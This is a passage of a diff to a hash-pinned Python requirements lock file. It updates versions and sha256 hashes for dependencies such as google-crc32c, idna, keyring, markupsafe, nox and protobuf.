--hash=sha256:74dea7751d98034887dbd821b7aae3e1d36eda111d6ca36c206c44478035709c \ - --hash=sha256:759ce4851a4bb15ecabae28f4d2e18983c244eddd767f560165563bf9aefbc8d \ - --hash=sha256:77e2fd3057c9d78e225fa0a2160f96b64a824de17840351b26825b0848022906 \ - --hash=sha256:7c074fece789b5034b9b1404a1f8208fc2d4c6ce9decdd16e8220c5a793e6f61 \ - --hash=sha256:7c42c70cd1d362284289c6273adda4c6af8039a8ae12dc451dcd61cdabb8ab57 \ - --hash=sha256:7f57f14606cd1dd0f0de396e1e53824c371e9544a822648cd76c034d209b559c \ - --hash=sha256:83c681c526a3439b5cf94f7420471705bbf96262f49a6fe546a6db5f687a3d4a \ - --hash=sha256:8485b340a6a9e76c62a7dce3c98e5f102c9219f4cfbf896a00cf48caf078d438 \ - --hash=sha256:84e6e8cd997930fc66d5bb4fde61e2b62ba19d62b7abd7a69920406f9ecca946 \ - --hash=sha256:89284716bc6a5a415d4eaa11b1726d2d60a0cd12aadf5439828353662ede9dd7 \ - --hash=sha256:8b87e1a59c38f275c0e3676fc2ab6d59eccecfd460be267ac360cc31f7bcde96 \ - --hash=sha256:8f24ed114432de109aa9fd317278518a5af2d31ac2ea6b952b2f7782b43da091 \ - --hash=sha256:98cb4d057f285bd80d8778ebc4fde6b4d509ac3f331758fb1528b733215443ae \ - --hash=sha256:998679bf62b7fb599d2878aa3ed06b9ce688b8974893e7223c60db155f26bd8d \ - --hash=sha256:9ba053c5f50430a3fcfd36f75aff9caeba0440b2d076afdb79a318d6ca245f88 \ - --hash=sha256:9c99616c853bb585301df6de07ca2cadad344fd1ada6d62bb30aec05219c45d2 \ - --hash=sha256:a1fd716e7a01f8e717490fbe2e431d2905ab8aa598b9b12f8d10abebb36b04dd \ - --hash=sha256:a2355cba1f4ad8b6988a4ca3feed5bff33f6af2d7f134852cf279c2aebfde541 \ - --hash=sha256:b1f8133c9a275df5613a451e73f36c2aea4fe13c5c8997e22cf355ebd7bd0728 \ - --hash=sha256:b8667b48e7a7ef66afba2c81e1094ef526388d35b873966d8a9a447974ed9178 \ - --hash=sha256:ba1eb1843304b1e5537e1fca632fa894d6f6deca8d6389636ee5b4797affb968 \ - --hash=sha256:be82c3c8cfb15b30f36768797a640e800513793d6ae1724aaaafe5bf86f8f346 \ - --hash=sha256:c02ec1c5856179f171e032a31d6f8bf84e5a75c45c33b2e20a3de353b266ebd8 \ - --hash=sha256:c672d99a345849301784604bfeaeba4db0c7aae50b95be04dd651fd2a7310b93 \ - --hash=sha256:c6c777a480337ac14f38564ac88ae82d4cd238bf293f0a22295b66eb89ffced7 \ - --hash=sha256:cae0274952c079886567f3f4f685bcaf5708f0a23a5f5216fdab71f81a6c0273 \ - --hash=sha256:cd67cf24a553339d5062eff51013780a00d6f97a39ca062781d06b3a73b15462 \ - --hash=sha256:d3515f198eaa2f0ed49f8819d5732d70698c3fa37384146079b3799b97667a94 \ - --hash=sha256:d5280312b9af0976231f9e317c20e4a61cd2f9629b7bfea6a693d1878a264ebd \ - --hash=sha256:de06adc872bcd8c2a4e0dc51250e9e65ef2ca91be023b9d13ebd67c2ba552e1e \ - --hash=sha256:e1674e4307fa3024fc897ca774e9c7562c957af85df55efe2988ed9056dc4e57 \ - --hash=sha256:e2096eddb4e7c7bdae4bd69ad364e55e07b8316653234a56552d9c988bd2d61b \ - --hash=sha256:e560628513ed34759456a416bf86b54b2476c59144a9138165c9a1575801d0d9 \ - --hash=sha256:edfedb64740750e1a3b16152620220f51d58ff1b4abceb339ca92e934775c27a \ - --hash=sha256:f13cae8cc389a440def0c8c52057f37359014ccbc9dc1f0827936bcd367c6100 \ - --hash=sha256:f314013e7dcd5cf45ab1945d92e713eec788166262ae8deb2cfacd53def27325 \ - --hash=sha256:f583edb943cf2e09c60441b910d6a20b4d9d626c75a36c8fcac01a6c96c01183 \ - --hash=sha256:fd8536e902db7e365f49e7d9029283403974ccf29b13fc7028b97e2295b33556 \ - --hash=sha256:fe70e325aa68fa4b5edf7d1a4b6f691eb04bbccac0ace68e34820d283b5f80d4 +google-crc32c==1.6.0 \ + --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ + --hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ + --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ + --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ + --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ + --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ + --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ + --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ + --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ + --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ + --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ + --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ + --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ + --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ + --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ + --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ + --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ + --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ + --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ + --hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ + --hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ + --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ + --hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ + --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ + --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ + --hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ + --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 # via # google-cloud-storage # google-resumable-media -google-resumable-media==2.7.1 \ - --hash=sha256:103ebc4ba331ab1bfdac0250f8033627a2cd7cde09e7ccff9181e31ba4315b2c \ - --hash=sha256:eae451a7b2e2cdbaaa0fd2eb00cc8a1ee5e95e16b55597359cbc3d27d7d90e33 +google-resumable-media==2.7.2 \ + --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ + --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 # via google-cloud-storage -googleapis-common-protos==1.63.2 \ - --hash=sha256:27a2499c7e8aff199665b22741997e485eccc8645aa9176c7c988e6fae507945 \ - --hash=sha256:27c5abdffc4911f28101e635de1533fb4cfd2c37fbaa9174587c799fac90aa87 +googleapis-common-protos==1.65.0 \ + --hash=sha256:2972e6c496f435b92590fd54045060867f3fe9be2c82ab148fc8885035479a63 \ + --hash=sha256:334a29d07cddc3aa01dee4988f9afd9b2916ee2ff49d6b757155dc0d197852c0 # via google-api-core -idna==3.7 \ - --hash=sha256:028ff3aadf0609c1fd278d8ea3089299412a7a8b9bd005dd08b9f8285bcb5cfc \ - --hash=sha256:82fee1fc78add43492d3a1898bfa6d8a904cc97d8427f683ed8e798d07761aa0 +idna==3.10 \ + --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ + --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 # via requests -importlib-metadata==8.0.0 \ - --hash=sha256:15584cf2b1bf449d98ff8a6ff1abef57bf20f3ac6454f431736cd3e660921b2f \ - --hash=sha256:188bd24e4c346d3f0a933f275c2fec67050326a856b9a359881d7c2a697e8812 +importlib-metadata==8.5.0 \ + --hash=sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b \ + --hash=sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7 # via # -r requirements.in # keyring @@ -271,13 +240,13 @@ jaraco-classes==3.4.0 \ --hash=sha256:47a024b51d0239c0dd8c8540c6c7f484be3b8fcf0b2d85c13825780d3b3f3acd \ --hash=sha256:f662826b6bed8cace05e7ff873ce0f9283b5c924470fe664fff1c2f00f581790 # via keyring -jaraco-context==5.3.0 \ - --hash=sha256:3e16388f7da43d384a1a7cd3452e72e14732ac9fe459678773a3608a812bf266 \ - --hash=sha256:c2f67165ce1f9be20f32f650f25d8edfc1646a8aeee48ae06fb35f90763576d2 +jaraco-context==6.0.1 \ + --hash=sha256:9bae4ea555cf0b14938dc0aee7c9f32ed303aa20a3b73e7dc80111628792d1b3 \ + --hash=sha256:f797fc481b490edb305122c9181830a3a5b76d84ef6d1aef2fb9b47ab956f9e4 # via keyring -jaraco-functools==4.0.1 \ - --hash=sha256:3b24ccb921d6b593bdceb56ce14799204f473976e2a9d4b15b04d0f2c2326664 \ - --hash=sha256:d33fa765374c0611b52f8b3a795f8900869aa88c84769d4d1746cd68fb28c3e8 +jaraco-functools==4.1.0 \ + --hash=sha256:70f7e0e2ae076498e212562325e805204fc092d7b4c17e0e86c959e249701a9d \ + --hash=sha256:ad159f13428bc4acbf5541ad6dec511f91573b90fba04df61dafa2a1231cf649 # via keyring jeepney==0.8.0 \ --hash=sha256:5efe48d255973902f6badc3ce55e2aa6c5c3b3bc642059ef3a91247bcfcc5806 \ @@ -289,9 +258,9 @@ jinja2==3.1.4 \ --hash=sha256:4a3aee7acbbe7303aede8e9648d13b8bf88a429282aa6122a993f0ac800cb369 \ --hash=sha256:bc5dd2abb727a5319567b7a813e6a2e7318c39f4f487cfe6c89c6f9c7d25197d # via gcp-releasetool -keyring==25.2.1 \ - --hash=sha256:2458681cdefc0dbc0b7eb6cf75d0b98e59f9ad9b2d4edd319d18f68bdca95e50 \ - --hash=sha256:daaffd42dbda25ddafb1ad5fec4024e5bbcfe424597ca1ca452b299861e49f1b +keyring==25.4.1 \ + --hash=sha256:5426f817cf7f6f007ba5ec722b1bcad95a75b27d780343772ad76b17cb47b0bf \ + --hash=sha256:b07ebc55f3e8ed86ac81dd31ef14e81ace9dd9c3d4b5d77a6e9a2016d0d71a1b # via # gcp-releasetool # twine @@ -299,75 +268,76 @@ markdown-it-py==3.0.0 \ --hash=sha256:355216845c60bd96232cd8d8c40e8f9765cc86f46880e43a8fd22dc1a1a8cab1 \ --hash=sha256:e3f60a94fa066dc52ec76661e37c851cb232d92f9886b15cb560aaada2df8feb # via rich -markupsafe==2.1.5 \ - --hash=sha256:00e046b6dd71aa03a41079792f8473dc494d564611a8f89bbbd7cb93295ebdcf \ - --hash=sha256:075202fa5b72c86ad32dc7d0b56024ebdbcf2048c0ba09f1cde31bfdd57bcfff \ - --hash=sha256:0e397ac966fdf721b2c528cf028494e86172b4feba51d65f81ffd65c63798f3f \ - --hash=sha256:17b950fccb810b3293638215058e432159d2b71005c74371d784862b7e4683f3 \ - --hash=sha256:1f3fbcb7ef1f16e48246f704ab79d79da8a46891e2da03f8783a5b6fa41a9532 \ - --hash=sha256:2174c595a0d73a3080ca3257b40096db99799265e1c27cc5a610743acd86d62f \ - --hash=sha256:2b7c57a4dfc4f16f7142221afe5ba4e093e09e728ca65c51f5620c9aaeb9a617 \ - --hash=sha256:2d2d793e36e230fd32babe143b04cec8a8b3eb8a3122d2aceb4a371e6b09b8df \ - --hash=sha256:30b600cf0a7ac9234b2638fbc0fb6158ba5bdcdf46aeb631ead21248b9affbc4 \ - --hash=sha256:397081c1a0bfb5124355710fe79478cdbeb39626492b15d399526ae53422b906 \ - --hash=sha256:3a57fdd7ce31c7ff06cdfbf31dafa96cc533c21e443d57f5b1ecc6cdc668ec7f \ - --hash=sha256:3c6b973f22eb18a789b1460b4b91bf04ae3f0c4234a0a6aa6b0a92f6f7b951d4 \ - --hash=sha256:3e53af139f8579a6d5f7b76549125f0d94d7e630761a2111bc431fd820e163b8 \ - --hash=sha256:4096e9de5c6fdf43fb4f04c26fb114f61ef0bf2e5604b6ee3019d51b69e8c371 \ - --hash=sha256:4275d846e41ecefa46e2015117a9f491e57a71ddd59bbead77e904dc02b1bed2 \ - --hash=sha256:4c31f53cdae6ecfa91a77820e8b151dba54ab528ba65dfd235c80b086d68a465 \ - --hash=sha256:4f11aa001c540f62c6166c7726f71f7573b52c68c31f014c25cc7901deea0b52 \ - --hash=sha256:5049256f536511ee3f7e1b3f87d1d1209d327e818e6ae1365e8653d7e3abb6a6 \ - --hash=sha256:58c98fee265677f63a4385256a6d7683ab1832f3ddd1e66fe948d5880c21a169 \ - --hash=sha256:598e3276b64aff0e7b3451b72e94fa3c238d452e7ddcd893c3ab324717456bad \ - --hash=sha256:5b7b716f97b52c5a14bffdf688f971b2d5ef4029127f1ad7a513973cfd818df2 \ - --hash=sha256:5dedb4db619ba5a2787a94d877bc8ffc0566f92a01c0ef214865e54ecc9ee5e0 \ - --hash=sha256:619bc166c4f2de5caa5a633b8b7326fbe98e0ccbfacabd87268a2b15ff73a029 \ - --hash=sha256:629ddd2ca402ae6dbedfceeba9c46d5f7b2a61d9749597d4307f943ef198fc1f \ - --hash=sha256:656f7526c69fac7f600bd1f400991cc282b417d17539a1b228617081106feb4a \ - --hash=sha256:6ec585f69cec0aa07d945b20805be741395e28ac1627333b1c5b0105962ffced \ - --hash=sha256:72b6be590cc35924b02c78ef34b467da4ba07e4e0f0454a2c5907f473fc50ce5 \ - --hash=sha256:7502934a33b54030eaf1194c21c692a534196063db72176b0c4028e140f8f32c \ - --hash=sha256:7a68b554d356a91cce1236aa7682dc01df0edba8d043fd1ce607c49dd3c1edcf \ - --hash=sha256:7b2e5a267c855eea6b4283940daa6e88a285f5f2a67f2220203786dfa59b37e9 \ - --hash=sha256:823b65d8706e32ad2df51ed89496147a42a2a6e01c13cfb6ffb8b1e92bc910bb \ - --hash=sha256:8590b4ae07a35970728874632fed7bd57b26b0102df2d2b233b6d9d82f6c62ad \ - --hash=sha256:8dd717634f5a044f860435c1d8c16a270ddf0ef8588d4887037c5028b859b0c3 \ - --hash=sha256:8dec4936e9c3100156f8a2dc89c4b88d5c435175ff03413b443469c7c8c5f4d1 \ - --hash=sha256:97cafb1f3cbcd3fd2b6fbfb99ae11cdb14deea0736fc2b0952ee177f2b813a46 \ - --hash=sha256:a17a92de5231666cfbe003f0e4b9b3a7ae3afb1ec2845aadc2bacc93ff85febc \ - --hash=sha256:a549b9c31bec33820e885335b451286e2969a2d9e24879f83fe904a5ce59d70a \ - --hash=sha256:ac07bad82163452a6884fe8fa0963fb98c2346ba78d779ec06bd7a6262132aee \ - --hash=sha256:ae2ad8ae6ebee9d2d94b17fb62763125f3f374c25618198f40cbb8b525411900 \ - --hash=sha256:b91c037585eba9095565a3556f611e3cbfaa42ca1e865f7b8015fe5c7336d5a5 \ - --hash=sha256:bc1667f8b83f48511b94671e0e441401371dfd0f0a795c7daa4a3cd1dde55bea \ - --hash=sha256:bec0a414d016ac1a18862a519e54b2fd0fc8bbfd6890376898a6c0891dd82e9f \ - --hash=sha256:bf50cd79a75d181c9181df03572cdce0fbb75cc353bc350712073108cba98de5 \ - --hash=sha256:bff1b4290a66b490a2f4719358c0cdcd9bafb6b8f061e45c7a2460866bf50c2e \ - --hash=sha256:c061bb86a71b42465156a3ee7bd58c8c2ceacdbeb95d05a99893e08b8467359a \ - --hash=sha256:c8b29db45f8fe46ad280a7294f5c3ec36dbac9491f2d1c17345be8e69cc5928f \ - --hash=sha256:ce409136744f6521e39fd8e2a24c53fa18ad67aa5bc7c2cf83645cce5b5c4e50 \ - --hash=sha256:d050b3361367a06d752db6ead6e7edeb0009be66bc3bae0ee9d97fb326badc2a \ - --hash=sha256:d283d37a890ba4c1ae73ffadf8046435c76e7bc2247bbb63c00bd1a709c6544b \ - --hash=sha256:d9fad5155d72433c921b782e58892377c44bd6252b5af2f67f16b194987338a4 \ - --hash=sha256:daa4ee5a243f0f20d528d939d06670a298dd39b1ad5f8a72a4275124a7819eff \ - --hash=sha256:db0b55e0f3cc0be60c1f19efdde9a637c32740486004f20d1cff53c3c0ece4d2 \ - --hash=sha256:e61659ba32cf2cf1481e575d0462554625196a1f2fc06a1c777d3f48e8865d46 \ - --hash=sha256:ea3d8a3d18833cf4304cd2fc9cbb1efe188ca9b5efef2bdac7adc20594a0e46b \ - --hash=sha256:ec6a563cff360b50eed26f13adc43e61bc0c04d94b8be985e6fb24b81f6dcfdf \ - --hash=sha256:f5dfb42c4604dddc8e4305050aa6deb084540643ed5804d7455b5df8fe16f5e5 \ - --hash=sha256:fa173ec60341d6bb97a89f5ea19c85c5643c1e7dedebc22f5181eb73573142c5 \ - --hash=sha256:fa9db3f79de01457b03d4f01b34cf91bc0048eb2c3846ff26f66687c2f6d16ab \ - --hash=sha256:fce659a462a1be54d2ffcacea5e3ba2d74daa74f30f5f143fe0c58636e355fdd \ - --hash=sha256:ffee1f21e5ef0d712f9033568f8344d5da8cc2869dbd08d87c84656e6a2d2f68 +markupsafe==3.0.1 \ + --hash=sha256:0778de17cff1acaeccc3ff30cd99a3fd5c50fc58ad3d6c0e0c4c58092b859396 \ + --hash=sha256:0f84af7e813784feb4d5e4ff7db633aba6c8ca64a833f61d8e4eade234ef0c38 \ + --hash=sha256:17b2aea42a7280db02ac644db1d634ad47dcc96faf38ab304fe26ba2680d359a \ + --hash=sha256:242d6860f1fd9191aef5fae22b51c5c19767f93fb9ead4d21924e0bcb17619d8 \ + --hash=sha256:244dbe463d5fb6d7ce161301a03a6fe744dac9072328ba9fc82289238582697b \ + --hash=sha256:26627785a54a947f6d7336ce5963569b5d75614619e75193bdb4e06e21d447ad \ + --hash=sha256:2a4b34a8d14649315c4bc26bbfa352663eb51d146e35eef231dd739d54a5430a \ + --hash=sha256:2ae99f31f47d849758a687102afdd05bd3d3ff7dbab0a8f1587981b58a76152a \ + --hash=sha256:312387403cd40699ab91d50735ea7a507b788091c416dd007eac54434aee51da \ + --hash=sha256:3341c043c37d78cc5ae6e3e305e988532b072329639007fd408a476642a89fd6 \ + --hash=sha256:33d1c36b90e570ba7785dacd1faaf091203d9942bc036118fab8110a401eb1a8 \ + --hash=sha256:3e683ee4f5d0fa2dde4db77ed8dd8a876686e3fc417655c2ece9a90576905344 \ + --hash=sha256:3ffb4a8e7d46ed96ae48805746755fadd0909fea2306f93d5d8233ba23dda12a \ + --hash=sha256:40621d60d0e58aa573b68ac5e2d6b20d44392878e0bfc159012a5787c4e35bc8 \ + --hash=sha256:40f1e10d51c92859765522cbd79c5c8989f40f0419614bcdc5015e7b6bf97fc5 \ + --hash=sha256:45d42d132cff577c92bfba536aefcfea7e26efb975bd455db4e6602f5c9f45e7 \ + --hash=sha256:48488d999ed50ba8d38c581d67e496f955821dc183883550a6fbc7f1aefdc170 \ + --hash=sha256:4935dd7883f1d50e2ffecca0aa33dc1946a94c8f3fdafb8df5c330e48f71b132 \ + --hash=sha256:4c2d64fdba74ad16138300815cfdc6ab2f4647e23ced81f59e940d7d4a1469d9 \ + --hash=sha256:4c8817557d0de9349109acb38b9dd570b03cc5014e8aabf1cbddc6e81005becd \ + --hash=sha256:4ffaaac913c3f7345579db4f33b0020db693f302ca5137f106060316761beea9 \ + --hash=sha256:5a4cb365cb49b750bdb60b846b0c0bc49ed62e59a76635095a179d440540c346 \ + --hash=sha256:62fada2c942702ef8952754abfc1a9f7658a4d5460fabe95ac7ec2cbe0d02abc \ + --hash=sha256:67c519635a4f64e495c50e3107d9b4075aec33634272b5db1cde839e07367589 \ + --hash=sha256:6a54c43d3ec4cf2a39f4387ad044221c66a376e58c0d0e971d47c475ba79c6b5 \ + --hash=sha256:7044312a928a66a4c2a22644147bc61a199c1709712069a344a3fb5cfcf16915 \ + --hash=sha256:730d86af59e0e43ce277bb83970530dd223bf7f2a838e086b50affa6ec5f9295 \ + --hash=sha256:800100d45176652ded796134277ecb13640c1a537cad3b8b53da45aa96330453 \ + --hash=sha256:80fcbf3add8790caddfab6764bde258b5d09aefbe9169c183f88a7410f0f6dea \ + --hash=sha256:82b5dba6eb1bcc29cc305a18a3c5365d2af06ee71b123216416f7e20d2a84e5b \ + --hash=sha256:852dc840f6d7c985603e60b5deaae1d89c56cb038b577f6b5b8c808c97580f1d \ + --hash=sha256:8ad4ad1429cd4f315f32ef263c1342166695fad76c100c5d979c45d5570ed58b \ + --hash=sha256:8ae369e84466aa70f3154ee23c1451fda10a8ee1b63923ce76667e3077f2b0c4 \ + --hash=sha256:93e8248d650e7e9d49e8251f883eed60ecbc0e8ffd6349e18550925e31bd029b \ + --hash=sha256:973a371a55ce9ed333a3a0f8e0bcfae9e0d637711534bcb11e130af2ab9334e7 \ + --hash=sha256:9ba25a71ebf05b9bb0e2ae99f8bc08a07ee8e98c612175087112656ca0f5c8bf \ + --hash=sha256:a10860e00ded1dd0a65b83e717af28845bb7bd16d8ace40fe5531491de76b79f \ + --hash=sha256:a4792d3b3a6dfafefdf8e937f14906a51bd27025a36f4b188728a73382231d91 \ + --hash=sha256:a7420ceda262dbb4b8d839a4ec63d61c261e4e77677ed7c66c99f4e7cb5030dd \ + --hash=sha256:ad91738f14eb8da0ff82f2acd0098b6257621410dcbd4df20aaa5b4233d75a50 \ + --hash=sha256:b6a387d61fe41cdf7ea95b38e9af11cfb1a63499af2759444b99185c4ab33f5b \ + --hash=sha256:b954093679d5750495725ea6f88409946d69cfb25ea7b4c846eef5044194f583 \ + --hash=sha256:bbde71a705f8e9e4c3e9e33db69341d040c827c7afa6789b14c6e16776074f5a \ + --hash=sha256:beeebf760a9c1f4c07ef6a53465e8cfa776ea6a2021eda0d0417ec41043fe984 \ + --hash=sha256:c91b394f7601438ff79a4b93d16be92f216adb57d813a78be4446fe0f6bc2d8c \ + --hash=sha256:c97ff7fedf56d86bae92fa0a646ce1a0ec7509a7578e1ed238731ba13aabcd1c \ + --hash=sha256:cb53e2a99df28eee3b5f4fea166020d3ef9116fdc5764bc5117486e6d1211b25 \ + --hash=sha256:cbf445eb5628981a80f54087f9acdbf84f9b7d862756110d172993b9a5ae81aa \ + --hash=sha256:d06b24c686a34c86c8c1fba923181eae6b10565e4d80bdd7bc1c8e2f11247aa4 \ + --hash=sha256:d98e66a24497637dd31ccab090b34392dddb1f2f811c4b4cd80c230205c074a3 \ + --hash=sha256:db15ce28e1e127a0013dfb8ac243a8e392db8c61eae113337536edb28bdc1f97 \ + --hash=sha256:db842712984e91707437461930e6011e60b39136c7331e971952bb30465bc1a1 \ + --hash=sha256:e24bfe89c6ac4c31792793ad9f861b8f6dc4546ac6dc8f1c9083c7c4f2b335cd \ + --hash=sha256:e81c52638315ff4ac1b533d427f50bc0afc746deb949210bc85f05d4f15fd772 \ + --hash=sha256:e9393357f19954248b00bed7c56f29a25c930593a77630c719653d51e7669c2a \ + --hash=sha256:ee3941769bd2522fe39222206f6dd97ae83c442a94c90f2b7a25d847d40f4729 \ + --hash=sha256:f31ae06f1328595d762c9a2bf29dafd8621c7d3adc130cbb46278079758779ca \ + --hash=sha256:f94190df587738280d544971500b9cafc9b950d32efcb1fba9ac10d84e6aa4e6 \ + --hash=sha256:fa7d686ed9883f3d664d39d5a8e74d3c5f63e603c2e3ff0abcba23eac6542635 \ + --hash=sha256:fb532dd9900381d2e8f48172ddc5a59db4c445a11b9fab40b3b786da40d3b56b \ + --hash=sha256:fe32482b37b4b00c7a52a07211b479653b7fe4f22b2e481b9a9b099d8a430f2f # via jinja2 mdurl==0.1.2 \ --hash=sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8 \ --hash=sha256:bb413d29f5eea38f31dd4754dd7377d4465116fb207585f97bf925588687c1ba # via markdown-it-py -more-itertools==10.3.0 \ - --hash=sha256:e5d93ef411224fbcef366a6e8ddc4c5781bc6359d43412a65dd5964e46111463 \ - --hash=sha256:ea6a02e24a9161e51faad17a8782b92a0df82c12c1c8886fec7f0c3fa1a1b320 +more-itertools==10.5.0 \ + --hash=sha256:037b0d3203ce90cca8ab1defbbdac29d5f993fc20131f3664dc8d6acfa872aef \ + --hash=sha256:5482bfef7849c25dc3c6dd53a6173ae4795da2a41a80faea6700d9f5846c5da6 # via # jaraco-classes # jaraco-functools @@ -389,9 +359,9 @@ nh3==0.2.18 \ --hash=sha256:de3ceed6e661954871d6cd78b410213bdcb136f79aafe22aa7182e028b8c7307 \ --hash=sha256:f0eca9ca8628dbb4e916ae2491d72957fdd35f7a5d326b7032a345f111ac07fe # via readme-renderer -nox==2024.4.15 \ - --hash=sha256:6492236efa15a460ecb98e7b67562a28b70da006ab0be164e8821177577c0565 \ - --hash=sha256:ecf6700199cdfa9e5ea0a41ff5e6ef4641d09508eda6edb89d9987864115817f +nox==2024.10.9 \ + --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ + --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 # via -r requirements.in packaging==24.1 \ --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ @@ -403,41 +373,41 @@ pkginfo==1.10.0 \ --hash=sha256:5df73835398d10db79f8eecd5cd86b1f6d29317589ea70796994d49399af6297 \ --hash=sha256:889a6da2ed7ffc58ab5b900d888ddce90bce912f2d2de1dc1c26f4cb9fe65097 # via twine -platformdirs==4.2.2 \ - --hash=sha256:2d7a1657e36a80ea911db832a8a6ece5ee53d8de21edd5cc5879af6530b1bfee \ - --hash=sha256:38b7b51f512eed9e84a22788b4bce1de17c0adb134d6becb09836e37d8654cd3 +platformdirs==4.3.6 \ + --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ + --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv proto-plus==1.24.0 \ --hash=sha256:30b72a5ecafe4406b0d339db35b56c4059064e69227b8c3bda7462397f966445 \ --hash=sha256:402576830425e5f6ce4c2a6702400ac79897dab0b4343821aa5188b0fab81a12 # via google-api-core -protobuf==5.27.2 \ - --hash=sha256:0e341109c609749d501986b835f667c6e1e24531096cff9d34ae411595e26505 \ - --hash=sha256:176c12b1f1c880bf7a76d9f7c75822b6a2bc3db2d28baa4d300e8ce4cde7409b \ - --hash=sha256:354d84fac2b0d76062e9b3221f4abbbacdfd2a4d8af36bab0474f3a0bb30ab38 \ - --hash=sha256:4fadd8d83e1992eed0248bc50a4a6361dc31bcccc84388c54c86e530b7f58863 \ - --hash=sha256:54330f07e4949d09614707c48b06d1a22f8ffb5763c159efd5c0928326a91470 \ - --hash=sha256:610e700f02469c4a997e58e328cac6f305f649826853813177e6290416e846c6 \ - --hash=sha256:7fc3add9e6003e026da5fc9e59b131b8f22b428b991ccd53e2af8071687b4fce \ - --hash=sha256:9e8f199bf7f97bd7ecebffcae45ebf9527603549b2b562df0fbc6d4d688f14ca \ - --hash=sha256:a109916aaac42bff84702fb5187f3edadbc7c97fc2c99c5ff81dd15dcce0d1e5 \ - --hash=sha256:b848dbe1d57ed7c191dfc4ea64b8b004a3f9ece4bf4d0d80a367b76df20bf36e \ - --hash=sha256:f3ecdef226b9af856075f28227ff2c90ce3a594d092c39bee5513573f25e2714 +protobuf==5.28.2 \ + --hash=sha256:2c69461a7fcc8e24be697624c09a839976d82ae75062b11a0972e41fd2cd9132 \ + --hash=sha256:35cfcb15f213449af7ff6198d6eb5f739c37d7e4f1c09b5d0641babf2cc0c68f \ + --hash=sha256:52235802093bd8a2811abbe8bf0ab9c5f54cca0a751fdd3f6ac2a21438bffece \ + --hash=sha256:59379674ff119717404f7454647913787034f03fe7049cbef1d74a97bb4593f0 \ + --hash=sha256:5e8a95246d581eef20471b5d5ba010d55f66740942b95ba9b872d918c459452f \ + --hash=sha256:87317e9bcda04a32f2ee82089a204d3a2f0d3c8aeed16568c7daf4756e4f1fe0 \ + --hash=sha256:8ddc60bf374785fb7cb12510b267f59067fa10087325b8e1855b898a0d81d276 \ + --hash=sha256:a8b9403fc70764b08d2f593ce44f1d2920c5077bf7d311fefec999f8c40f78b7 \ + --hash=sha256:c0ea0123dac3399a2eeb1a1443d82b7afc9ff40241433296769f7da42d142ec3 \ + --hash=sha256:ca53faf29896c526863366a52a8f4d88e69cd04ec9571ed6082fa117fac3ab36 \ + --hash=sha256:eeea10f3dc0ac7e6b4933d32db20662902b4ab81bf28df12218aa389e9c2102d # via # gcp-docuploader # gcp-releasetool # google-api-core # googleapis-common-protos # proto-plus -pyasn1==0.6.0 \ - --hash=sha256:3a35ab2c4b5ef98e17dfdec8ab074046fbda76e281c5a706ccd82328cfc8f64c \ - --hash=sha256:cca4bb0f2df5504f02f6f8a775b6e416ff9b0b3b16f7ee80b5a3153d9b804473 